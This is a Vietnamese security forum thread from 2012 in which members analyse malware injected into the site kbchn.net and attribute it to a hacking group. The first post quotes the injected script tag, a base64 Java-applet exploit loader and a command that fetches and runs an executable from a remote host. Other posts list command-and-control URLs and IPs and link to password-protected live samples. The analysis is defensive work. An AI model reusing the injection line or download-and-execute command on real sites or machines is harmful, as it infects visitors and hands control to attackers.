| [Analyzing] Trang KBCHN.NET bị chèn mã độc (28/3/2012) |
28/03/2012 23:47:23 (+0700) | #1 | 260203 |
miyumi2
Member
![[Minus]](/hvaonline/templates/viet/images/minus.gif "[Minus]") |
0 |
![[Plus]](/hvaonline/templates/viet/images/plus.gif "[Plus]")
|
|
Joined: 11/03/2012 15:33:55
Messages: 57
Offline
|
|
23h ngày 28/3/2012 (GMT+7)
1. Đoạn mã khởi tạo đầu tiên được chèn vào cuối file http://kbchn.net/js/language/vi.js
Code:
document.write('<script language="javascript" src="http://daily.us.to/js/jquery.php"></script>');
2. File jquery.php này chỉ trả về dữ liệu (javascript text) nếu trong HTTP header có:
Code:
Referer: http://kbchn.net/
nếu Referer khác sẽ trả về "Error!".
3. Đoạn javascript này
Code:
document.write(base64_decode('PGFwcGxldCB3aWR0aD0nMScgaGVpZ2.....
sẽ chèn một JAVA APPLET chạy code thông qua exploit của JRE
Code:
http://daily.us.to/js/MediaPlayer.jar
4. Mục đích chạy applet là tạo và thực thi 1 file .vbs (yahadfq.vbs) trong thư mục TEMP, khi file này chạy sẽ dùng CreateObject khởi tạo ADODB.Stream lưu lại file lấy từ 1 URL (dùng WinHttp.WinHttpRequest)
Code:
start /MIN %temp%\yahadfq.vbs http://daily.us.to/js/rss.xml %temp%\phfvxlr.exe
--> File rss.xml là 1 exe sau khi tải về sẽ đổi tên thành phfvxlr.exe và chạy.
Trong file exe này có 3 resource (TYPELIB 1000, 1010, 1011) với chuỗi header đầu tiên là MSFT.
Đến đây em đuối rồi, đi tắm thôi  , các anh em nào rảnh thì RE con exe này tiếp xem thế nào.
Tất cả các file em thu thập được trong quá trình phân tích:
http://www.mediafire.com/?79yupp68ip3ogbq
Pass: 123
Cached:
Code:
http://liveweb.archive.org/http://kbchn.net/js/language/vi.js
http://liveweb.archive.org/http://daily.us.to/js/MediaPlayer.jar
http://liveweb.archive.org/http://daily.us.to/js/rss.xml
|
|
|
 |
|
| [Analyzing] Trang KBCHN.NET bị chèn mã độc (28/3/2012) |
29/03/2012 00:35:04 (+0700) | #2 | 260206 |
![[Avatar]](/hvaonline/images/avatar/3099a4ec6dc1da1e77c1b4070c7aa9b8.jpg "[Avatar]")
|
bolzano_1989
Journalist
|
|
0 |
|
|
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
|
|
http://kbchn.net là một trang web lề trái, phát hiện của miyumi2 rất thú vị, khả năng rất cao là có bàn tay của stl.
Qua một tấn công của stl trước đây, mình confirm chuyện bọn hacker stl có kinh nghiệm trong việc exploit JRE (Java Runtime Environment). |
|
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY |
|
|
|
| [Analyzing] Trang KBCHN.NET bị chèn mã độc (28/3/2012) |
29/03/2012 05:46:51 (+0700) | #3 | 260212 |
![[Avatar]](/hvaonline/images/avatar/089f41810321eefc3f4eef5d4a388e42.png "[Avatar]")
|
conmale
Administrator
|
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
|
|
Ha ha... spot the differences:
và:
Các bạn stl bế tắc vậy sao trời?  |
|
| What bringing us together is stronger than what pulling us apart. |
|
|
|
| [Analyzing] Trang KBCHN.NET bị chèn mã độc (28/3/2012) |
29/03/2012 07:16:26 (+0700) | #4 | 260217 |
TQN
Elite Member
|
|
0 |
|
|
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
|
|
| Lại là fake resource type TypeLib. Đám này với đám hack và chèn fake Unikey vừa rồi là 1. |
|
|
|
|
| [Analyzing] Trang KBCHN.NET bị chèn mã độc (28/3/2012) |
29/03/2012 07:16:43 (+0700) | #5 | 260218 |
miyumi2
Member
|
|
0 |
|
|
Joined: 11/03/2012 15:33:55
Messages: 57
Offline
|
|
Tiếp tục chạy file rss.xml (đổi tên thành rss.exe) sẽ thấy rất giống chiêu "Kim Thiền thoát xác" của trojan nhúng trong Unikey:
- Tạo file 5.tmp vào thư mục TEMP và thực thi file này, 5.tmp sẽ terminate process rss.exe, đổi tên rss.exe thành rss.tmp
- Giải mã từ resource tạo file FBAgent.exe trong SYSTEM32, đây là file chính của trojan, khi chạy sẽ nâng quyền lên SYSTEM (chạy giống 1 service).
- Giải mã từ resource tạo lại file rss.exe (kích thước nhỏ hơn rất nhiều), xóa file rss.tmp.
File FBAgent.exe có code phát hiện máy ảo và debugger nên tạm thời chưa theo dõi tiếp được.
http://www.mediafire.com/download.php?42c4ca67blcfksi
Pass: 123 |
|
|
|
|
| [Analyzing] Trang KBCHN.NET bị chèn mã độc (28/3/2012) |
29/03/2012 07:18:46 (+0700) | #6 | 260219 |
TQN
Elite Member
|
|
0 |
|
|
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
|
|
Hoan hô miyumi2. HVA ta đã có thêm 1 người giỏi về malwares analyze. stl chuyến này mệt rồi, thò vòi nào ra là bị chặt vòi đó.
Code của cái đám mèo què này, em mới xem sơ sơ, 100% là code VC++ 2010 fake/hack Unikey site vừa rồi. Bà con mau mau download các file của miyumi2 vừa upload, submit lên các AVs.
File rss.exe mà có size = 25k là file sạch, của MS, có signed và pdb symbol đàng hoàng. Bà con có thể xoá và không cần submit file đó.
Trong bụng FBAgent còn một con nữa, bà con reverser cố gắng rút nó ra luôn.
PS: Biết cái nghề RCE chi cho khổ vậy trời, muốn nghỉ ngơi, rữa tay gác kiếm mà cũng không yên. Giang hồ dậy sóng hoài ! |
|
|
|
|
| [Analyzing] Trang KBCHN.NET bị chèn mã độc (28/3/2012) |
29/03/2012 09:24:26 (+0700) | #7 | 260230 |
![[Avatar]](/hvaonline/images/avatar/d55e099378323e5c909505306214abc9.jpg "[Avatar]")
|
xuanphongdocco
Member
|
|
0 |
|
|
Joined: 19/08/2009 08:25:03
Messages: 247
Offline
|
|
| Cho mình hỏi một tí, làm sao mà mấy bác lấy được file http://daily.us.to/js/jquery.php vậy. Mặc dù mình edit source trang http://kbchn.net/ và thêm từ đó 1 liên kết http://daily.us.to/js/jquery.php nhưng vẫn không được. |
|
| Xuân Phong Nguyễn |
|
|
|
| [Analyzing] Trang KBCHN.NET bị chèn mã độc (28/3/2012) |
29/03/2012 09:27:12 (+0700) | #8 | 260231 |
![[Avatar]](/hvaonline/images/avatar/ee57e7e13a1e4820f716d2bca44f4ed9.png "[Avatar]")
|
Ky0
Moderator
|
Joined: 16/08/2009 23:09:08
Messages: 532
Offline
|
|
TQN wrote:
Hoan hô miyumi2. HVA ta đã có thêm 1 người giỏi về malwares analyze. stl chuyến này mệt rồi, thò vòi nào ra là bị chặt vòi đó.
Code của cái đám mèo què này, em mới xem sơ sơ, 100% là code VC++ 2010 fake/hack Unikey site vừa rồi. Bà con mau mau download các file của miyumi2 vừa upload, submit lên các AVs.
File rss.exe mà có size = 25k là file sạch, của MS, có signed và pdb symbol đàng hoàng. Bà con có thể xoá và không cần submit file đó.
Trong bụng FBAgent còn một con nữa, bà con reverser cố gắng rút nó ra luôn.
PS: Biết cái nghề RCE chi cho khổ vậy trời, muốn nghỉ ngơi, rữa tay gác kiếm mà cũng không yên. Giang hồ dậy sóng hoài !
Anh em nào không có khả năng RCE thì nên hỗ trợ cộng đồng bằng cách submit lên cho các AV
@TQN: Em nhớ lịch sử HVA cũng có đoạn
caothuvolam wrote:
Chúng tôi xin mạn phép mượn lời của cố nhạc sĩ Diệp Minh Tuyền để nói lên bức xúc của HVA trước những hành động gây hấn của VHF:
“Dù rằng đời ta thích hoa hồng,
Kẻ thù buộc ta ôm cây súng”
Lần này kẻ thù là stl 
|
|
UITNetwork.com
Let's Connect |
|
|
|
| [Analyzing] Trang KBCHN.NET bị chèn mã độc (28/3/2012) |
29/03/2012 10:31:20 (+0700) | #9 | 260243 |
miyumi2
Member
|
|
0 |
|
|
Joined: 11/03/2012 15:33:55
Messages: 57
Offline
|
|
bolzano_1989 wrote:
http://kbchn.net là một trang web lề trái, phát hiện của miyumi2 rất thú vị, khả năng rất cao là có bàn tay của stl.
Qua một tấn công của stl trước đây, mình confirm chuyện bọn hacker stl có kinh nghiệm trong việc exploit JRE (Java Runtime Environment).
Cho mình ngoài lề một chút.
Cá nhân mình là người làm chuyên môn kỹ thuật nên không quan tâm nhiều về lề trái, lề phải, quan trọng là sự trung thực, khách quan.
Để khách quan các bạn có thể tham khảo nội dung phỏng vấn Thứ trưởng Bộ Ngoại Giao Việt Nam Nguyễn Thanh Sơn, (có đề cập đến KBCHN.NET):
- http://www.youtube.com/watch?v=zPDnaUo1IPM
- www.tienphong.vn/Kieu-Bao/564322/Doan-bao-chi-hai-ngoai-ve-Viet-Nam-lam-phong-su-Tet-tpp.html
(link gốc từ tienphong.vn bị lỗi truy cập, không biết có liên quan gì đến sự việc chèn mã độc này không?)
- CACHED: http://webcache.googleusercontent.com/search?q=cache:REy4PSc50M8J:www.tienphong.vn/Kieu-Bao/564322/Doan-bao-chi-hai-ngoai-ve-Viet-Nam-lam-phong-su-Tet-tpp.html+&cd=1&hl=vi&ct=clnk&gl=vn
P/S: http://www.tienphong.vn/Tim-Kiem/Index.html?keyword=kbchn |
|
|
|
|
| [Analyzing] Trang KBCHN.NET bị chèn mã độc (28/3/2012) |
29/03/2012 10:39:06 (+0700) | #10 | 260246 |
miyumi2
Member
|
|
0 |
|
|
Joined: 11/03/2012 15:33:55
Messages: 57
Offline
|
|
xuanphongdocco wrote:
Cho mình hỏi một tí, làm sao mà mấy bác lấy được file http://daily.us.to/js/jquery.php vậy. Mặc dù mình edit source trang http://kbchn.net/ và thêm từ đó 1 liên kết http://daily.us.to/js/jquery.php nhưng vẫn không được.
|
|
|
|
|
| [Analyzing] Trang KBCHN.NET bị chèn mã độc (28/3/2012) |
29/03/2012 11:15:39 (+0700) | #11 | 260254 |
|
bolzano_1989
Journalist
|
|
0 |
|
|
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
|
|
miyumi2 wrote:
Cho mình ngoài lề một chút.
Cá nhân mình là người làm chuyên môn kỹ thuật nên không quan tâm nhiều về lề trái, lề phải, quan trọng là sự trung thực, khách quan.
Để khách quan các bạn có thể tham khảo nội dung phỏng vấn Thứ trưởng Bộ Ngoại Giao Việt Nam Nguyễn Thanh Sơn, (có đề cập đến KBCHN.NET):
- http://www.youtube.com/watch?v=zPDnaUo1IPM
Mình thấy thứ trưởng Sơn đang làm chuyện chính trị ở xứ người.
miyumi2 wrote:
Cho mình ngoài lề một chút.
Cá nhân mình là người làm chuyên môn kỹ thuật nên không quan tâm nhiều về lề trái, lề phải, quan trọng là sự trung thực, khách quan.
- www.tienphong.vn/Kieu-Bao/564322/Doan-bao-chi-hai-ngoai-ve-Viet-Nam-lam-phong-su-Tet-tpp.html
(link gốc từ tienphong.vn bị lỗi truy cập, không biết có liên quan gì đến sự việc chèn mã độc này không?)
- CACHED: http://webcache.googleusercontent.com/search?q=cache:REy4PSc50M8J:www.tienphong.vn/Kieu-Bao/564322/Doan-bao-chi-hai-ngoai-ve-Viet-Nam-lam-phong-su-Tet-tpp.html+&cd=1&hl=vi&ct=clnk&gl=vn
Họ chỉ nhắc đến cho bà con biết là có đoàn báo chí hải ngoại về Việt Nam để làm phóng sự Tết cho kiều bào ở nước ngoài "có một tầm nhìn và suy nghĩ về Xuân Quê Hương".
Với lại bạn xem kĩ hơn đi, trong bài ghi là "báo mạng kbchn.vn" không phải báo mạng kbchn.net đâu  .
Cho đến thời điểm hiện tại, không có một báo mạng có uy tín nào ở Việt Nam dẫn bài từ trang kbchn.net cả  . |
|
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY |
|
|
|
| [Analyzing] Trang KBCHN.NET bị chèn mã độc (28/3/2012) |
29/03/2012 11:39:55 (+0700) | #12 | 260256 |
miyumi2
Member
|
|
0 |
|
|
Joined: 11/03/2012 15:33:55
Messages: 57
Offline
|
|
TQN wrote:
Trong bụng FBAgent còn một con nữa, bà con reverser cố gắng rút nó ra luôn.
Extract thêm được 1 chú từ FBAgent.exe:
http://www.mediafire.com/download.php?yt996448h6z8ci7
Pass: 123 |
|
|
|
|
| [Analyzing] Trang KBCHN.NET bị chèn mã độc (28/3/2012) |
29/03/2012 12:54:23 (+0700) | #13 | 260260 |
PXMMRF
Administrator
|
Joined: 26/09/2002 07:17:55
Messages: 946
Offline
|
|
bolzano_1989 wrote:
http://kbchn.net là một trang web lề trái (1), phát hiện của miyumi2 rất thú vị, khả năng rất cao là có bàn tay của stl (2).
Qua một tấn công của stl trước đây, mình confirm chuyện bọn hacker stl có kinh nghiệm trong việc exploit JRE (Java Runtime Environment).
(1)
Nó không phải là "lề trái" đâu em! Hì hì. Xem thử một vài bài, thí dụ bài này:
http://kbchn.net/news/Hien-tuong-Viet-Tan/Viet-Tan-Va-Am-Muu-Dung-Lao-Dong-Viet-O-Dai-Loan-De-Chong-Pha-To-Quoc-2817/
(2) OK! Đúng như vậy
Mình đang đi sâu vào một vài khía cạnh |
|
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
|
|
|
|
| [Analyzing] Trang KBCHN.NET bị chèn mã độc (28/3/2012) |
29/03/2012 13:20:40 (+0700) | #14 | 260263 |
PXMMRF
Administrator
|
Joined: 26/09/2002 07:17:55
Messages: 946
Offline
|
|
miyumi2 wrote:
Tiếp tục chạy file rss.xml (đổi tên thành rss.exe) sẽ thấy rất giống chiêu "Kim Thiền thoát xác" của trojan nhúng trong Unikey:
- Tạo file 5.tmp vào thư mục TEMP và thực thi file này, 5.tmp sẽ terminate process rss.exe, đổi tên rss.exe thành rss.tmp
- Giải mã từ resource tạo file FBAgent.exe trong SYSTEM32, đây là file chính của trojan, khi chạy sẽ nâng quyền lên SYSTEM (chạy giống 1 service).
- Giải mã từ resource tạo lại file rss.exe (kích thước nhỏ hơn rất nhiều), xóa file rss.tmp.
File FBAgent.exe có code phát hiện máy ảo và debugger nên tạm thời chưa theo dõi tiếp được.
http://www.mediafire.com/download.php?42c4ca67blcfksi
Pass: 123
FBAgent.exe chính là một Trojạn, tên là: TR/Obess.A
Trojạn này cũng xuất hiện trong một số file nằm trong gói tin 1 st.rar mà Mrs. Anonymous đăng tải lên mạng và cho là đã lấy ra trong các webserver của BKIS.
Trong gói tin 1 st. rar nói trên có khá nhiều file có virus -trojan (khoảng xấp xỉ 50 files). Có một file được nhúng vào một Trojan y hệt như Trojan nhúng vào file Unikey (fake) download từ một URL trên website sourcefroce, giả URL của tác giả Unikey Pham kim Long.
Có thời gian tôi sẽ viết thêm về vấn đề này.
( Chú ý: Cần làm rõ điều này: Hacker [có thể là STL] giả mạo một URL trong website sourcefroce.net, nơi mà user sẽ phải truy cập đến để download Unikey, chứ không phải là hacker dẫn người truy cập đến một website giả mạo bên ngoài, khác với sourceforce.net)
|
|
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
|
|
|
|
| [Analyzing] Trang KBCHN.NET bị chèn mã độc (28/3/2012) |
29/03/2012 13:28:55 (+0700) | #15 | 260264 |
|
bolzano_1989
Journalist
|
|
0 |
|
|
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
|
|
PXMMRF wrote:
bolzano_1989 wrote:
http://kbchn.net là một trang web lề trái (1), phát hiện của miyumi2 rất thú vị, khả năng rất cao là có bàn tay của stl (2).
Qua một tấn công của stl trước đây, mình confirm chuyện bọn hacker stl có kinh nghiệm trong việc exploit JRE (Java Runtime Environment).
(1)
Nó không phải là "lề trái" đâu em! Hì hì. Xem thử một vài bài, thí dụ bài này:
http://kbchn.net/news/Hien-tuong-Viet-Tan/Viet-Tan-Va-Am-Muu-Dung-Lao-Dong-Viet-O-Dai-Loan-De-Chong-Pha-To-Quoc-2817/
Em thấy nội tình trang này phức tạp lắm anh nên anh khó mà khẳng định trang này không phải là web lề trái:
http://kbchn.net/news/Tin-nguoi-Viet-Hai-Ngoai/BS-Nguyen-Xuan-Ngai-quan-niem-xay-dung-Phong-Trao-Dan-Chu-2764/
http://i.imgur.com/hbXAW.jpg
Theo em thì với các trang báo điện tử ở hải ngoại thì đám stl không cần biết báo này là lề trái hay phải, chỉ cần đông bà con kiều bào vào xem trang báo là đủ tiêu chí để tấn công rồi, mục tiêu sau cùng là exploit, cài cắm trojan, theo dõi kiều bào và "bọn phản động". |
|
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY |
|
|
|
| [Analyzing] Trang KBCHN.NET bị chèn mã độc (28/3/2012) |
29/03/2012 14:01:09 (+0700) | #16 | 260269 |
PXMMRF
Administrator
|
Joined: 26/09/2002 07:17:55
Messages: 946
Offline
|
|
xuanphongdocco wrote:
Cho mình hỏi một tí, làm sao mà mấy bác lấy được file http://daily.us.to/js/jquery.php vậy. Mặc dù mình edit source trang và thêm từ đó 1 liên kết http://daily.us.to/js/jquery.php nhưng vẫn không được.
Để đọc được file jquery.php trên webserver http://daily.us.to, bạn nên dùng "Malzilla" (thưc ra daily.us.to là một wordpress blog)
Trên giao diện Malzilla, URL thì điền vào http://daily.us.to/js/jquery.php, còn Referrer thì điền vào:
http://kbchn.net/. Rồi nhấn button "GET". Nôi dung File jquery.php hiện ra phía trên, dạng .txt, đươc encrypted.
------------------------
http://daily.us.to
IP 184.170.246.91
HTTP/1.1 200 OK
Server: nginx/1.0.9
Date: Thu, 29 Mar 2012 07:40:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.8
Set-Cookie: seafood=1
Master trên giống như là các master server điều khiển bot mà STL thường dùng.
|
|
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
|
|
|
|
| [Analyzing] Trang KBCHN.NET bị chèn mã độc (28/3/2012) |
29/03/2012 14:40:49 (+0700) | #17 | 260273 |
PXMMRF
Administrator
|
Joined: 26/09/2002 07:17:55
Messages: 946
Offline
|
|
Nói thêm về IP 184.170.246.91
IP này tại At-lan-ta USA
Ngoài daily.us.to trỏ về (sử dụng) IP 184.170.246.91, còn có hai website (domain) khác cũng đang trỏ về IP trên. Đó là:
http://cafeevn.com
http://muaha.youdontcare.com
Điều đặc biệt là trên hai website này chỉ có một file duy nhất (file index), với dòng chữ ngắn "index.html". Trình quản lý web cài đặt trong server (web server) cũng là NGINX:
HTTP headers:
HTTP/1.1 200 OK
Server: nginx/1.0.9
Date: Thu, 29 Mar 2012 08:39:57 GMT
Content-Type: text/html
Connection: close
Content-Length: 11
Last-Modified: Mon, 14 Nov 2011 04:03:09 GMT
Accept-Ranges: bytes
Cả 3 website này đều của 1 hacker (chắc là STL) |
|
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
|
|
|
|
| [Analyzing] Trang KBCHN.NET bị chèn mã độc (28/3/2012) |
29/03/2012 15:17:48 (+0700) | #18 | 260278 |
|
conmale
Administrator
|
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
|
|
Cách đây gần môt tháng, tạp chí Da Màu (damau.org) cũng bị chèn js về daily.us.to:
Ban quản trị damau.org đành phải tạm đóng cửa để "tẩy trùng" và họ có liên hệ với tôi xin ý kiến. Rất tiếc, họ thông báo chính thức rồi mới liên hệ với tôi cho nên cái dojo.php bị xoá biến nên tôi không kịp điều tra nhưng xét ra, nhóm "chơi" damau.org chắc chắn là nhóm "chơi" kbchn.net.
Nhớ lại hồi đầu giữa 2010, damau.org cũng bị chơi trò này một lần và lúc ấy, theo tôi tính toán thì hàng ngàn nhà văn, nhà thơ, độc giả và giới cầm bút thường xuyên viếng damau.org bị "dính trùng" của stl. Tôi đoán tôi cũng đã bị dính "trùng" trong khoảng thời gian ấy từ damau.org vì tôi viếng trang này khá thường xuyên ngay thời điểm sử dụng tạm laptop chạy Windows của công ty.
Sau đó một thới gian ngắn, stl tiếp tục chơi trò cũ và phát tán với dạng java applet ở vài trang khác và nguồn "xml" lúc ấy là từ http://images.ohbah.com. Xét nội dung cái js, nội dung cái java applet và phương thức cấy vào máy nạn nhân và xét với những chi tiết kỹ thuật phát tán khác như:
- giả mạo file xml rồi rename thành *.exe.
- giả mạo một "well known" soft như "FBAgent.exe" của Asus hay "QTTask.exe" của Apple Quicktime (được dùng những lần trước)
- những trò "kèm em bé" bên trong payload của binary.
thì chắc chắn vụ này là stl chớ chẳng phải ai khác.
Bởi vậy, một trong những ý kiến trên tôi mới nói stl "bế tắc vậy sao trời" là do họ không có gì mới. Cũng bao nhiêu đó thứ nhưng vẫn kiên trì chơi trò bại hoại này.
Một chi tiết khá quan trọn cũng nên đề cập là stl không phá tan nát, không trưng "lệnh bài", không cho một dòng "triệt tiêu thêm một tên phản quốc" (chẳng hạn) với những site như damau.org và kbchn.net và một số trang tương tự là vì những trang này là những trang có nhiều người viếng và là nơi dễ dàng biến các độc giả và khách viếng thành nạn nhân của họ. Chỉ có những trang họ cảm thấy không khai thác được gì thì họ dập (deface) hoặc ddos cho tơi tả (nếu không deface được). |
|
| What bringing us together is stronger than what pulling us apart. |
|
|
|
| [Analyzing] Trang KBCHN.NET bị chèn mã độc (28/3/2012) |
29/03/2012 15:22:30 (+0700) | #19 | 260279 |
|
conmale
Administrator
|
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
|
|
cafeevn.com:
Domain Name: CAFEEVN.COM
Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
ID#10760, PO Box 16
Note - All Postal Mails Rejected, visit Privacyprotect.org
Nobby Beach
null,QLD 4218
AU
Tel. +45.36946676
Creation Date: 14-Nov-2011
Expiration Date: 14-Nov-2012
Domain servers in listed order:
ns16.zoneedit.com
ns5.zoneedit.com
Administrative Contact:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
ID#10760, PO Box 16
Note - All Postal Mails Rejected, visit Privacyprotect.org
Nobby Beach
null,QLD 4218
AU
Tel. +45.36946676
cafeevn.com:
Domain Name: CAFEEVN.COM
Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
ID#10760, PO Box 16
Note - All Postal Mails Rejected, visit Privacyprotect.org
Nobby Beach
null,QLD 4218
AU
Tel. +45.36946676
Creation Date: 14-Nov-2011
Expiration Date: 14-Nov-2012
Domain servers in listed order:
ns16.zoneedit.com
ns5.zoneedit.com
Administrative Contact:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
ID#10760, PO Box 16
Note - All Postal Mails Rejected, visit Privacyprotect.org
Nobby Beach
null,QLD 4218
AU
Tel. +45.36946676
Quen thuộc hay lạ lẫm? . Không phải vô cớ mà tôi bảo "năm Thìn là năm cao số"  .
Các bạn stl lắm tiền nhiều của. Domain này đi thì lấy domain khác, host này đi thì lấy host khác mà.
Các ngài đại tá, thiếu tướng muốn tóm cổ stl dễ như trở bàn tay. Chỉ cần liên hệ với http://www.PublicDomainRegistry.com là có đầy đủ thông tin. Ha ha ha.
|
|
| What bringing us together is stronger than what pulling us apart. |
|
|
|
| [Analyzing] Trang KBCHN.NET bị chèn mã độc (28/3/2012) |
29/03/2012 15:46:59 (+0700) | #20 | 260285 |
aedn
Member
|
|
0 |
|
|
Joined: 27/03/2012 02:10:06
Messages: 9
Offline
|
|
Xin hỏi ngoài nè là bọn stl là ai vậy, em có đọc mấy cài phân tích trên diễn đàn và có tải về cái file doc mà bác Conmale và chú TQN bị dính virus đó nghịch thì bị dính chưởng. Mà không hiểu sao không ai report abuse cái file doc đó cho AV nhỉ ta 
Em mới report cái doc file đó cho avira, avg và mse, mới có avira, avg nói là oki roài, còn mse thì bảo đang xem xét. Có bác nào nói sơ qua cái exploit của doc file đó đc hổng.
Hơn nữa bọn stl tấn công các trang ở nước ngoài vậy, sao các trang đó không thu thập chứng cứ và kiện theo luật của nước sở tại nhỉ? Vì hầu hết các trang đều của người US, FR ... gốc việt mà. Theo em nghĩ thì họ nên đăng ký bảo hộ trang đó theo luật của nước sở tại. Nếu bọn stl mà là người việt thì nếu nó đi du lịch ngoài VN cũng sẽ bị tóm thôi. Nếu chúng ta có đủ chứng cứ 
Thân |
|
|
|
|
| [Analyzing] Trang KBCHN.NET bị chèn mã độc (28/3/2012) |
29/03/2012 15:58:11 (+0700) | #21 | 260287 |
|
conmale
Administrator
|
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
|
|
aedn wrote:
Xin hỏi ngoài nè là bọn stl là ai vậy, em có đọc mấy cài phân tích trên diễn đàn và có tải về cái file doc mà bác Conmale và chú TQN bị dính virus đó nghịch thì bị dính chưởng. Mà không hiểu sao không ai report abuse cái file doc đó cho AV nhỉ ta
Em mới report cái doc file đó cho avira, avg và mse, mới có avira, avg nói là oki roài, còn mse thì bảo đang xem xét. Có bác nào nói sơ qua cái exploit của doc file đó đc hổng.
Hơn nữa bọn stl tấn công các trang ở nước ngoài vậy, sao các trang đó không thu thập chứng cứ và kiện theo luật của nước sở tại nhỉ? Vì hầu hết các trang đều của người US, FR ... gốc việt mà. Theo em nghĩ thì họ nên đăng ký bảo hộ trang đó theo luật của nước sở tại. Nếu bọn stl mà là người việt thì nếu nó đi du lịch ngoài VN cũng sẽ bị tóm thôi. Nếu chúng ta có đủ chứng cứ
Thân
Nên tìm đọc đầy đủ thông tin rồi suy ngẫm trước khi phát biểu và nên tránh chen vào để hỏi những thứ không liên quan. Lần cảnh cáo này là lần cuối cùng dành cho bạn đó. |
|
| What bringing us together is stronger than what pulling us apart. |
|
|
|
| [Analyzing] Trang KBCHN.NET bị chèn mã độc (28/3/2012) |
29/03/2012 16:08:02 (+0700) | #22 | 260289 |
Xr0.9999
Member
|
|
0 |
|
|
Joined: 28/08/2011 19:55:11
Messages: 16
Location: Gia Nghĩa
Offline
|
|
các anh cho e hỏi:
từ cái URL : " http://kbchn.net"
làm sao các anh lại tìm ra nó referer tới http://daily.us.to/js/rss.xml ???
e có thắc mắc như vậy. |
|
|
|
|
| [Analyzing] Trang KBCHN.NET bị chèn mã độc (28/3/2012) |
29/03/2012 18:05:44 (+0700) | #23 | 260304 |
rang0
Member
|
|
0 |
|
|
Joined: 25/07/2011 10:55:47
Messages: 19
Offline
|
|
1. http://rock.yokiz.com/faq.php
2. http://nat.iwct.net/faq.php
3. http://web.zicur.com/faq.php
4. http://drive.nicpad.com/faq.php
5. http://ser.vailsx.com/index.php
6. http://lava.intraxs.net/index.php
7. http://fak.actcas.com/index.php
Mình tổng hợp lại các link mà service từ fake unikey (4 links đầu) và fake asus (3 link sau) sẽ connect tới. |
|
|
|
|
| [Analyzing] Trang KBCHN.NET bị chèn mã độc (28/3/2012) |
29/03/2012 18:10:55 (+0700) | #24 | 260306 |
PXMMRF
Administrator
|
Joined: 26/09/2002 07:17:55
Messages: 946
Offline
|
|
Thêm vài chi tiết về website daily.us.to nè:
- Chạy với WordPress 3.3
- Cài một JavaScript (loại JQuery JavaScript) - code sẽ đươc tôi post lên sau
- Trên website có một Form (user phải điền email address để Subscribe), nhưng dữ liệu điền vào form lai được chuyển đến một webserver khác là: http://sudarmuthu.com
- sudarmuthu.com webserver này sử dụng một IP khác là 178.79.134.13, trong khi daily.us.to thì IP là
IP 184.170.246.91, như nói ở trên. (Các bác STL nhiều webserver, IP quá)
- Webserver sudarmuthu.com không đặt ở Atlanta USA (như daily.us.to ) mà đặt ở Anh quốc cơ.
- Trên webserver có IP là 178.79.134.13 này, ngoài website http://sudarmuthu.com thì chỉ còn một website nữa là li190-13.members.linode.com, nhưng đây là reverse của sudarmuthu.com.
Thấy các bác STL giầu và mạnh chưa nào?. Không tin các bạn check kỹ lại xem. Hì hì
|
|
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
|
|
|
|
| [Analyzing] Trang KBCHN.NET bị chèn mã độc (28/3/2012) |
29/03/2012 18:14:36 (+0700) | #25 | 260307 |
|
conmale
Administrator
|
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
|
|
| Hoan hô và cảm ơn hai bạn miyumi2 và rang0. Hai bạn đã giúp tiết kiệm rất nhiều thời gian để phân tích vụ này. |
|
| What bringing us together is stronger than what pulling us apart. |
|
|
|
| [Analyzing] Trang KBCHN.NET bị chèn mã độc (28/3/2012) |
29/03/2012 18:19:12 (+0700) | #26 | 260308 |
![[Avatar]](/hvaonline/images/avatar/1e4eba502e47f5317a37883c1acd639d.jpg "[Avatar]")
|
quygia128
Member
|
|
0 |
|
|
Joined: 15/07/2009 20:50:28
Messages: 119
Location: Somewhere
Offline
|
|
Chiến này có nhiều dữ liệu để C50 làm việc rồi . Chắc chắn sẽ tìm ra "thủ phạm" sớm thôi.
Bác miyumi2 extract cái file sao hay vậy ? (File thứ 3 bác gửi lên ấy 101.exe) quy bị terminate với thằng FBAgent.exe mà chưa tìm được giải pháp nè (chạy trên VirtualBox). |
|
.::Mới bắt đầu trên con đường dài::.
.::Super Newbiez::. |
|
|
|
| [Analyzing] Trang KBCHN.NET bị chèn mã độc (28/3/2012) |
29/03/2012 19:10:42 (+0700) | #27 | 260312 |
